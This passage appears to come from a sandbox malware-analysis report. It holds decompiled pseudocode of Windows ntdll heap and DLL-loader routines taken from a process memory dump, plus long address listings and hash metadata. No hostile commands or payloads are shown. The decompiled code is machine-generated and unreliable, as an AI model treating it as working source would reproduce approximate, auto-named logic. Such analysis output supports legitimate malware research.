										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E33DAF058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = E33D03C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = E33D03C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = E33CEFABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = E33D03C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E33DAF13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E33D01EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						L33D00B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E33CEF6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                                                                                                            0x33cef113
                                                                                                                                                                                            0x33cef120
                                                                                                                                                                                            0x33cef123
                                                                                                                                                                                            0x33cef127
                                                                                                                                                                                            0x33cef137
                                                                                                                                                                                            0x33cef13b
                                                                                                                                                                                            0x33d4dc64
                                                                                                                                                                                            0x33d4dc67
                                                                                                                                                                                            0x33cef1d5
                                                                                                                                                                                            0x33cef1d5
                                                                                                                                                                                            0x33cef1c7
                                                                                                                                                                                            0x33cef1cd
                                                                                                                                                                                            0x33cef1cd
                                                                                                                                                                                            0x33cef144
                                                                                                                                                                                            0x33d4dc75
                                                                                                                                                                                            0x33d4dc79
                                                                                                                                                                                            0x33d4dc7b
                                                                                                                                                                                            0x33d4dc8d
                                                                                                                                                                                            0x33d4dc92
                                                                                                                                                                                            0x33d4dc94
                                                                                                                                                                                            0x33d4dc9a
                                                                                                                                                                                            0x33d4dc9a
                                                                                                                                                                                            0x33d4dc9a
                                                                                                                                                                                            0x33d4dc9a
                                                                                                                                                                                            0x33d4dc94
                                                                                                                                                                                            0x33d4dca0
                                                                                                                                                                                            0x33d4dca3
                                                                                                                                                                                            0x33d4dca5
                                                                                                                                                                                            0x33cef202
                                                                                                                                                                                            0x33cef202
                                                                                                                                                                                            0x33cef205
                                                                                                                                                                                            0x33cef207
                                                                                                                                                                                            0x33d4dcae
                                                                                                                                                                                            0x33cef20d
                                                                                                                                                                                            0x33cef21b
                                                                                                                                                                                            0x33cef21b
                                                                                                                                                                                            0x33cef21b
                                                                                                                                                                                            0x33cef228
                                                                                                                                                                                            0x33cef22a
                                                                                                                                                                                            0x33cef22e
                                                                                                                                                                                            0x33cef231
                                                                                                                                                                                            0x33cef23f
                                                                                                                                                                                            0x33cef243
                                                                                                                                                                                            0x33cef248
                                                                                                                                                                                            0x33cef24f
                                                                                                                                                                                            0x33cef256
                                                                                                                                                                                            0x33cef259
                                                                                                                                                                                            0x33cef263
                                                                                                                                                                                            0x33cef269
                                                                                                                                                                                            0x33cef26f
                                                                                                                                                                                            0x33cef275
                                                                                                                                                                                            0x33cef278
                                                                                                                                                                                            0x33cef27d
                                                                                                                                                                                            0x33cef45b
                                                                                                                                                                                            0x33cef461
                                                                                                                                                                                            0x33cef461
                                                                                                                                                                                            0x33cef283
                                                                                                                                                                                            0x33cef28d
                                                                                                                                                                                            0x33cef291
                                                                                                                                                                                            0x33cef292
                                                                                                                                                                                            0x33cef295
                                                                                                                                                                                            0x33cef3be
                                                                                                                                                                                            0x33cef3be
                                                                                                                                                                                            0x33cef3be
                                                                                                                                                                                            0x33cef29d
                                                                                                                                                                                            0x33cef2a1
                                                                                                                                                                                            0x33cef494
                                                                                                                                                                                            0x33cef498
                                                                                                                                                                                            0x33cef49d
                                                                                                                                                                                            0x33cef4a1
                                                                                                                                                                                            0x33cef4a5
                                                                                                                                                                                            0x33d4dcb5
                                                                                                                                                                                            0x33d4dcb7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4dcbd
                                                                                                                                                                                            0x33cef4ab
                                                                                                                                                                                            0x33cef4b2
                                                                                                                                                                                            0x33d4dcc2
                                                                                                                                                                                            0x33d4dcc4
                                                                                                                                                                                            0x33d4dcca
                                                                                                                                                                                            0x33d4dcd0
                                                                                                                                                                                            0x33d4dcd4
                                                                                                                                                                                            0x33d4dcf3
                                                                                                                                                                                            0x33d4dcf8
                                                                                                                                                                                            0x33d4dcd6
                                                                                                                                                                                            0x33d4dceb
                                                                                                                                                                                            0x33d4dcf0
                                                                                                                                                                                            0x33d4dcfe
                                                                                                                                                                                            0x33d4dd03
                                                                                                                                                                                            0x33d4dd08
                                                                                                                                                                                            0x33d4dd10
                                                                                                                                                                                            0x33d4dd12
                                                                                                                                                                                            0x33d4dd17
                                                                                                                                                                                            0x33d4dd17
                                                                                                                                                                                            0x33d4dd1c
                                                                                                                                                                                            0x33d4dd20
                                                                                                                                                                                            0x33d4dd20
                                                                                                                                                                                            0x33d4dcc4
                                                                                                                                                                                            0x33cef4b8
                                                                                                                                                                                            0x33cef4be
                                                                                                                                                                                            0x33cef4c1
                                                                                                                                                                                            0x33cef4c5
                                                                                                                                                                                            0x33cef4c7
                                                                                                                                                                                            0x33cef4cb
                                                                                                                                                                                            0x33cef4cd
                                                                                                                                                                                            0x33d4dd28
                                                                                                                                                                                            0x33d4dd28
                                                                                                                                                                                            0x33cef4d9
                                                                                                                                                                                            0x33cef4d9
                                                                                                                                                                                            0x33cef4dd
                                                                                                                                                                                            0x33cef4e1
                                                                                                                                                                                            0x33d4dd30
                                                                                                                                                                                            0x33d4dd37
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4dd3d
                                                                                                                                                                                            0x33d4e0fe
                                                                                                                                                                                            0x33d4e0fe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e104
                                                                                                                                                                                            0x33d4e10a
                                                                                                                                                                                            0x33d4e10e
                                                                                                                                                                                            0x33d4e12d
                                                                                                                                                                                            0x33d4e132
                                                                                                                                                                                            0x33d4e110
                                                                                                                                                                                            0x33d4e125
                                                                                                                                                                                            0x33d4e12a
                                                                                                                                                                                            0x33d4e138
                                                                                                                                                                                            0x33d4e13d
                                                                                                                                                                                            0x33d4e142
                                                                                                                                                                                            0x33d4e14a
                                                                                                                                                                                            0x33d4e14c
                                                                                                                                                                                            0x33d4e151
                                                                                                                                                                                            0x33d4e151
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef4e7
                                                                                                                                                                                            0x33cef4f5
                                                                                                                                                                                            0x33cef4fa
                                                                                                                                                                                            0x33cef4fc
                                                                                                                                                                                            0x33d4dd44
                                                                                                                                                                                            0x33d4dd44
                                                                                                                                                                                            0x33d4dd4a
                                                                                                                                                                                            0x33d4dd4f
                                                                                                                                                                                            0x33d4e159
                                                                                                                                                                                            0x33d4e159
                                                                                                                                                                                            0x33cef1d2
                                                                                                                                                                                            0x33cef1d2
                                                                                                                                                                                            0x33cef1d4
                                                                                                                                                                                            0x33cef1d4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef1d4
                                                                                                                                                                                            0x33d4dd6d
                                                                                                                                                                                            0x33d4e156
                                                                                                                                                                                            0x33d4e156
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e156
                                                                                                                                                                                            0x33cef502
                                                                                                                                                                                            0x33cef507
                                                                                                                                                                                            0x33cef50c
                                                                                                                                                                                            0x33cef50e
                                                                                                                                                                                            0x33d4dd80
                                                                                                                                                                                            0x33cef514
                                                                                                                                                                                            0x33cef514
                                                                                                                                                                                            0x33cef514
                                                                                                                                                                                            0x33cef516
                                                                                                                                                                                            0x33cef519
                                                                                                                                                                                            0x33d4dd8a
                                                                                                                                                                                            0x33d4dd90
                                                                                                                                                                                            0x33d4dd97
                                                                                                                                                                                            0x33d4dda9
                                                                                                                                                                                            0x33d4dda9
                                                                                                                                                                                            0x33d4dd97
                                                                                                                                                                                            0x33cef51f
                                                                                                                                                                                            0x33cef523
                                                                                                                                                                                            0x33cef529
                                                                                                                                                                                            0x33cef52c
                                                                                                                                                                                            0x33cef532
                                                                                                                                                                                            0x33d4ddb3
                                                                                                                                                                                            0x33d4ddb3
                                                                                                                                                                                            0x33cef53c
                                                                                                                                                                                            0x33cef541
                                                                                                                                                                                            0x33cef54b
                                                                                                                                                                                            0x33cef550
                                                                                                                                                                                            0x33cef55c
                                                                                                                                                                                            0x33cef563
                                                                                                                                                                                            0x33cef56d
                                                                                                                                                                                            0x33cef570
                                                                                                                                                                                            0x33cef575
                                                                                                                                                                                            0x33cef577
                                                                                                                                                                                            0x33cef577
                                                                                                                                                                                            0x33cef577
                                                                                                                                                                                            0x33cef577
                                                                                                                                                                                            0x33cef57d
                                                                                                                                                                                            0x33cef582
                                                                                                                                                                                            0x33d4ddc2
                                                                                                                                                                                            0x33d4ddca
                                                                                                                                                                                            0x33d4ddce
                                                                                                                                                                                            0x33d4ddda
                                                                                                                                                                                            0x33d4ddde
                                                                                                                                                                                            0x33d4deaf
                                                                                                                                                                                            0x33d4deb3
                                                                                                                                                                                            0x33d4dec1
                                                                                                                                                                                            0x33d4dec7
                                                                                                                                                                                            0x33d4dec7
                                                                                                                                                                                            0x33d4dde4
                                                                                                                                                                                            0x33d4dde8
                                                                                                                                                                                            0x33d4ddea
                                                                                                                                                                                            0x33d4dded
                                                                                                                                                                                            0x33d4ddf7
                                                                                                                                                                                            0x33d4ddfa
                                                                                                                                                                                            0x33d4ddfc
                                                                                                                                                                                            0x33d4de02
                                                                                                                                                                                            0x33d4de08
                                                                                                                                                                                            0x33d4de0a
                                                                                                                                                                                            0x33d4de0d
                                                                                                                                                                                            0x33d4de0f
                                                                                                                                                                                            0x33d4de15
                                                                                                                                                                                            0x33d4de18
                                                                                                                                                                                            0x33d4de37
                                                                                                                                                                                            0x33d4de3c
                                                                                                                                                                                            0x33d4de1a
                                                                                                                                                                                            0x33d4de2f
                                                                                                                                                                                            0x33d4de34
                                                                                                                                                                                            0x33d4de42
                                                                                                                                                                                            0x33d4de47
                                                                                                                                                                                            0x33d4de4d
                                                                                                                                                                                            0x33d4de53
                                                                                                                                                                                            0x33d4de55
                                                                                                                                                                                            0x33d4de5a
                                                                                                                                                                                            0x33d4de5a
                                                                                                                                                                                            0x33d4de5f
                                                                                                                                                                                            0x33d4de5f
                                                                                                                                                                                            0x33d4de0d
                                                                                                                                                                                            0x33d4de63
                                                                                                                                                                                            0x33d4de66
                                                                                                                                                                                            0x33d4de69
                                                                                                                                                                                            0x33d4de72
                                                                                                                                                                                            0x33d4de73
                                                                                                                                                                                            0x33d4de77
                                                                                                                                                                                            0x33d4de7c
                                                                                                                                                                                            0x33d4de7e
                                                                                                                                                                                            0x33d4de7f
                                                                                                                                                                                            0x33d4de80
                                                                                                                                                                                            0x33d4de81
                                                                                                                                                                                            0x33d4de87
                                                                                                                                                                                            0x33d4de88
                                                                                                                                                                                            0x33d4de8d
                                                                                                                                                                                            0x33d4de91
                                                                                                                                                                                            0x33d4de91
                                                                                                                                                                                            0x33d4de95
                                                                                                                                                                                            0x33d4de95
                                                                                                                                                                                            0x33d4de9d
                                                                                                                                                                                            0x33d4dea0
                                                                                                                                                                                            0x33d4dea5
                                                                                                                                                                                            0x33d4dea5
                                                                                                                                                                                            0x33d4ddde
                                                                                                                                                                                            0x33cef588
                                                                                                                                                                                            0x33cef58d
                                                                                                                                                                                            0x33cef58f
                                                                                                                                                                                            0x33d4ded7
                                                                                                                                                                                            0x33cef595
                                                                                                                                                                                            0x33cef595
                                                                                                                                                                                            0x33cef595
                                                                                                                                                                                            0x33cef597
                                                                                                                                                                                            0x33cef59a
                                                                                                                                                                                            0x33d4dee1
                                                                                                                                                                                            0x33d4deea
                                                                                                                                                                                            0x33d4def0
                                                                                                                                                                                            0x33d4defb
                                                                                                                                                                                            0x33d4defd
                                                                                                                                                                                            0x33d4df08
                                                                                                                                                                                            0x33d4df08
                                                                                                                                                                                            0x33d4df08
                                                                                                                                                                                            0x33d4df2b
                                                                                                                                                                                            0x33d4df2b
                                                                                                                                                                                            0x33d4def0
                                                                                                                                                                                            0x33cef5a0
                                                                                                                                                                                            0x33cef5a5
                                                                                                                                                                                            0x33cef5aa
                                                                                                                                                                                            0x33cef5af
                                                                                                                                                                                            0x33cef5b1
                                                                                                                                                                                            0x33d4df3e
                                                                                                                                                                                            0x33cef5b7
                                                                                                                                                                                            0x33cef5b7
                                                                                                                                                                                            0x33cef5b7
                                                                                                                                                                                            0x33cef5b9
                                                                                                                                                                                            0x33cef5bc
                                                                                                                                                                                            0x33d4df4a
                                                                                                                                                                                            0x33d4df4c
                                                                                                                                                                                            0x33d4df57
                                                                                                                                                                                            0x33d4df57
                                                                                                                                                                                            0x33d4df57
                                                                                                                                                                                            0x33d4df5c
                                                                                                                                                                                            0x33d4df5d
                                                                                                                                                                                            0x33d4df61
                                                                                                                                                                                            0x33d4df7c
                                                                                                                                                                                            0x33d4df88
                                                                                                                                                                                            0x33d4df89
                                                                                                                                                                                            0x33d4df8d
                                                                                                                                                                                            0x33d4df8d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef5bc
                                                                                                                                                                                            0x33cef4e1
                                                                                                                                                                                            0x33cef2a7
                                                                                                                                                                                            0x33cef2ad
                                                                                                                                                                                            0x33cef2b6
                                                                                                                                                                                            0x33cef2ba
                                                                                                                                                                                            0x33cef2bc
                                                                                                                                                                                            0x33d4df97
                                                                                                                                                                                            0x33d4df9d
                                                                                                                                                                                            0x33d4df9d
                                                                                                                                                                                            0x33cef2c4
                                                                                                                                                                                            0x33cef2c7
                                                                                                                                                                                            0x33cef2cb
                                                                                                                                                                                            0x33cef2cd
                                                                                                                                                                                            0x33cef2d2
                                                                                                                                                                                            0x33cef2d6
                                                                                                                                                                                            0x33cef3c8
                                                                                                                                                                                            0x33cef3c8
                                                                                                                                                                                            0x33cef2dc
                                                                                                                                                                                            0x33cef2e1
                                                                                                                                                                                            0x33cef2e3
                                                                                                                                                                                            0x33d4e0ed
                                                                                                                                                                                            0x33d4e0f3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e0f9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e0f9
                                                                                                                                                                                            0x33cef2e9
                                                                                                                                                                                            0x33cef2eb
                                                                                                                                                                                            0x33cef2ef
                                                                                                                                                                                            0x33cef2f3
                                                                                                                                                                                            0x33cef302
                                                                                                                                                                                            0x33cef302
                                                                                                                                                                                            0x33cef304
                                                                                                                                                                                            0x33cef346
                                                                                                                                                                                            0x33cef346
                                                                                                                                                                                            0x33cef348
                                                                                                                                                                                            0x33cef34c
                                                                                                                                                                                            0x33cef3ea
                                                                                                                                                                                            0x33cef3f2
                                                                                                                                                                                            0x33cef3f6
                                                                                                                                                                                            0x33cef402
                                                                                                                                                                                            0x33cef406
                                                                                                                                                                                            0x33d4e046
                                                                                                                                                                                            0x33d4e049
                                                                                                                                                                                            0x33d4e057
                                                                                                                                                                                            0x33d4e05d
                                                                                                                                                                                            0x33d4e05d
                                                                                                                                                                                            0x33cef40c
                                                                                                                                                                                            0x33cef410
                                                                                                                                                                                            0x33cef413
                                                                                                                                                                                            0x33cef423
                                                                                                                                                                                            0x33cef426
                                                                                                                                                                                            0x33cef428
                                                                                                                                                                                            0x33cef42e
                                                                                                                                                                                            0x33cef434
                                                                                                                                                                                            0x33d4dfe4
                                                                                                                                                                                            0x33d4dfe7
                                                                                                                                                                                            0x33d4dfed
                                                                                                                                                                                            0x33d4dff3
                                                                                                                                                                                            0x33d4dff6
                                                                                                                                                                                            0x33d4e015
                                                                                                                                                                                            0x33d4e01a
                                                                                                                                                                                            0x33d4dff8
                                                                                                                                                                                            0x33d4e00d
                                                                                                                                                                                            0x33d4e012
                                                                                                                                                                                            0x33d4e020
                                                                                                                                                                                            0x33d4e025
                                                                                                                                                                                            0x33d4e02b
                                                                                                                                                                                            0x33d4e031
                                                                                                                                                                                            0x33d4e033
                                                                                                                                                                                            0x33d4e038
                                                                                                                                                                                            0x33d4e038
                                                                                                                                                                                            0x33d4e03d
                                                                                                                                                                                            0x33d4e03d
                                                                                                                                                                                            0x33d4dfe7
                                                                                                                                                                                            0x33cef43a
                                                                                                                                                                                            0x33cef43d
                                                                                                                                                                                            0x33cef440
                                                                                                                                                                                            0x33cef442
                                                                                                                                                                                            0x33cef470
                                                                                                                                                                                            0x33cef471
                                                                                                                                                                                            0x33cef475
                                                                                                                                                                                            0x33cef47a
                                                                                                                                                                                            0x33cef47c
                                                                                                                                                                                            0x33cef47d
                                                                                                                                                                                            0x33cef47e
                                                                                                                                                                                            0x33cef47f
                                                                                                                                                                                            0x33cef482
                                                                                                                                                                                            0x33cef483
                                                                                                                                                                                            0x33cef488
                                                                                                                                                                                            0x33cef48c
                                                                                                                                                                                            0x33cef48c
                                                                                                                                                                                            0x33cef444
                                                                                                                                                                                            0x33cef444
                                                                                                                                                                                            0x33cef444
                                                                                                                                                                                            0x33cef446
                                                                                                                                                                                            0x33cef451
                                                                                                                                                                                            0x33cef451
                                                                                                                                                                                            0x33cef406
                                                                                                                                                                                            0x33cef36b
                                                                                                                                                                                            0x33cef37a
                                                                                                                                                                                            0x33cef37f
                                                                                                                                                                                            0x33cef384
                                                                                                                                                                                            0x33cef389
                                                                                                                                                                                            0x33cef38b
                                                                                                                                                                                            0x33d4e06d
                                                                                                                                                                                            0x33cef391
                                                                                                                                                                                            0x33cef391
                                                                                                                                                                                            0x33cef391
                                                                                                                                                                                            0x33cef393
                                                                                                                                                                                            0x33cef396
                                                                                                                                                                                            0x33d4e077
                                                                                                                                                                                            0x33d4e080
                                                                                                                                                                                            0x33d4e086
                                                                                                                                                                                            0x33d4e091
                                                                                                                                                                                            0x33d4e093
                                                                                                                                                                                            0x33d4e09e
                                                                                                                                                                                            0x33d4e09e
                                                                                                                                                                                            0x33d4e09e
                                                                                                                                                                                            0x33d4e0bb
                                                                                                                                                                                            0x33d4e0bb
                                                                                                                                                                                            0x33d4e086
                                                                                                                                                                                            0x33cef39c
                                                                                                                                                                                            0x33cef3a1
                                                                                                                                                                                            0x33cef3a6
                                                                                                                                                                                            0x33cef3a8
                                                                                                                                                                                            0x33d4e0ce
                                                                                                                                                                                            0x33cef3ae
                                                                                                                                                                                            0x33cef3ae
                                                                                                                                                                                            0x33cef3ae
                                                                                                                                                                                            0x33cef3b0
                                                                                                                                                                                            0x33cef3b3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef3b9
                                                                                                                                                                                            0x33d4e0dd
                                                                                                                                                                                            0x33d4e0df
                                                                                                                                                                                            0x33d4df70
                                                                                                                                                                                            0x33d4df70
                                                                                                                                                                                            0x33d4df70
                                                                                                                                                                                            0x33d4df79
                                                                                                                                                                                            0x33d4df7a
                                                                                                                                                                                            0x33d4df7b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4df7b
                                                                                                                                                                                            0x33cef3b3
                                                                                                                                                                                            0x33cef306
                                                                                                                                                                                            0x33cef31a
                                                                                                                                                                                            0x33cef31f
                                                                                                                                                                                            0x33cef321
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef327
                                                                                                                                                                                            0x33cef32c
                                                                                                                                                                                            0x33cef32e
                                                                                                                                                                                            0x33d4dfaf
                                                                                                                                                                                            0x33cef334
                                                                                                                                                                                            0x33cef334
                                                                                                                                                                                            0x33cef334
                                                                                                                                                                                            0x33cef339
                                                                                                                                                                                            0x33cef33c
                                                                                                                                                                                            0x33d4dfb9
                                                                                                                                                                                            0x33d4dfc2
                                                                                                                                                                                            0x33d4dfc8
                                                                                                                                                                                            0x33d4dfda
                                                                                                                                                                                            0x33d4dfda
                                                                                                                                                                                            0x33d4dfc8
                                                                                                                                                                                            0x33cef342
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef342
                                                                                                                                                                                            0x33cef2f9
                                                                                                                                                                                            0x33cef2fc
                                                                                                                                                                                            0x33cef3d0
                                                                                                                                                                                            0x33cef3d2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef3d8
                                                                                                                                                                                            0x33cef3db
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef3e1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef3e1
                                                                                                                                                                                            0x33cef3db
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef2fc
                                                                                                                                                                                            0x33cef14a
                                                                                                                                                                                            0x33cef150
                                                                                                                                                                                            0x33d4dc6e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4dc6e
                                                                                                                                                                                            0x33cef159
                                                                                                                                                                                            0x33cef15b
                                                                                                                                                                                            0x33cef162
                                                                                                                                                                                            0x33cef1d0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef17b
                                                                                                                                                                                            0x33cef184
                                                                                                                                                                                            0x33cef189
                                                                                                                                                                                            0x33cef18c
                                                                                                                                                                                            0x33cef18e
                                                                                                                                                                                            0x33cef19e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef1a0
                                                                                                                                                                                            0x33cef1a3
                                                                                                                                                                                            0x33cef1b1
                                                                                                                                                                                            0x33cef1ba
                                                                                                                                                                                            0x33cef1be
                                                                                                                                                                                            0x33cef1c5
                                                                                                                                                                                            0x33cef1dc
                                                                                                                                                                                            0x33cef1e4
                                                                                                                                                                                            0x33cef1e9
                                                                                                                                                                                            0x33cef1eb
                                                                                                                                                                                            0x33cef1ef
                                                                                                                                                                                            0x33cef1f4
                                                                                                                                                                                            0x33cef1fa
                                                                                                                                                                                            0x33cef1fa
                                                                                                                                                                                            0x33cef1eb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef1c5
                                                                                                                                                                                            0x33cef19e

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                            • API String ID: 0-523794902
                                                                                                                                                                                            • Opcode ID: 0f326ba44ce5f15bf7e1d94e6b2e8a3f2b914f4a2f60b24724980a174a6063ef
                                                                                                                                                                                            • Instruction ID: ad1bcb9e6058fe53b24d2f32a0e8207c4d53a34c3c7c2dc7abc1c206e5c2804c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f326ba44ce5f15bf7e1d94e6b2e8a3f2b914f4a2f60b24724980a174a6063ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: C4420E756097819FD305CF28C880B2ABBE5FF88785F4A4A6DF495CB652DB30D841CB62
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D0B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                                            			E33D0B0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(L33D0C4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x33de37c0 & 0x00000005;
						if(( *0x33de37c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E33D6E692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							E33CFFCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E33D0C7E7(_t183, 0x33cc116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
